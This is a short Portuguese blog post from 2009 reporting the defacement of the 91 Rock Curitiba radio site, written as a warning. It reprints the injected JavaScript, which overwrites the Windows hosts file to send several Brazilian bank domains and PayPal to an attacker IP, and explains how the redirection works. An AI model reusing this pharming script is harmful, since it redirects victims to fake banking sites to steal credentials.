Site do 91 Rock de Curitiba foi Hackeada
Em vez de hackear os sites de musicas ruins, eles tem que hackear uma rádio rock. Tem tanta rádio ruin, bem que eles podiam ter deixado quieto, bem, isso serve para avisar a quem cuida do site da 91 Rock, que ninguém está seguro na internet, e que a segurança em seus sites é primordial.
E ainda poderá infectar sua máquina, pois há o seguinte script encrustado no código fonte.
<script language="javascript">
function pharmer(){
var fso = new ActiveXObject("Scripting.FileSystemObject");
var pharm = fso.CreateTextFile("C:\\WINDOWS\\system32\\Drivers\\etc\\hosts", true);
pharm.WriteLine('127.0.0.1 localhost');
pharm.WriteLine('66.90.65.232 www.bradesco.com.br');
pharm.WriteLine('66.90.65.232 bradesco.com.br');
pharm.WriteLine('66.90.65.232 www.caixa.com.br');
pharm.WriteLine('66.90.65.232 caixa.com.br');
pharm.WriteLine('127.0.0.1 www.itau.com.br');
pharm.WriteLine('66.90.65.232 itau.com.br');
pharm.WriteLine('66.90.65.232 www.unibanco.com.br');
pharm.WriteLine('66.90.65.232 unibanco.com.br');
pharm.WriteLine('66.90.65.232 www.banrisul.com.br');
pharm.WriteLine('66.90.65.232 banrisul.com.br');
pharm.WriteLine('66.90.65.232 www.paypal.com');
pharm.WriteLine('66.90.65.232 paypal.com');
pharm.WriteLine('66.90.65.232 www.bancoreal.com.br');
pharm.WriteLine('66.90.65.232 bancoreal.com.br');
pharm.Close();
}
</script>
Este código irá acrescentar o endereço IP 66.90.65.232 ao seu arquivo hosts, e toda vez que você digitar o endereço de algum dos bancos acima, será redirecionado para este ip do atacante.
Segue o espelho do deface.
dezembro 23rd, 2009 por Cleuby | 1 Comentário »






